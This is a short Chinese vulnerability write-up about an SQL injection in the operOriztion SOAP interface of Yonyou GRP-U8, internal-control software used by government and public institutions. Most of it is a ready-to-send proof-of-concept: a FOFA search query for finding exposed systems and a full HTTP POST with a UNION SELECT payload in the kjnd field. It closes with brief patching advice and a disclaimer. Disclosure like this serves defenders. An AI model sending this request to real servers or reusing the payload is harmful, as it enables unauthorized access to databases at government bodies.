前言
免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。
一、产品简介
用友GRP-U8行政事业内控管理软件是一个综合性的管理工具,旨在帮助政府及行政事业单位提高管理效率,确保财务和业务的规范运作。通过采用现代化的信息技术,它能够为用户提供稳定、全面且易于操作的管理平台。
二、漏洞描述
该系统的operOriztion接口存在SQL注入漏洞
三、影响范围
未知
四、复现环境
FOFA:app=“用友-GRP-U8”
五、漏洞复现
1.访问存在漏洞的网站,抓包
2.POC
POST /services/operOriztion HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Content-Type: text/xml;charset=UTF-8
SOAPAction: ""
Content-Length: 463<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsdd="http://xml.apache.org/axis/wsdd/"><soapenv:Header/><soapenv:Body><wsdd:getGsbmfaByKjnd soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><kjnd xsi:type="xsd:string">' UNION ALL SELECT @@version --</kjnd></wsdd:getGsbmfaByKjnd></soapenv:Body></soapenv:Envelope>
3.成功
六、修复建议
关闭互联网暴露面访问的权限,及时更新系统
参考链接
https://cn-sec.com/archives/2683513.html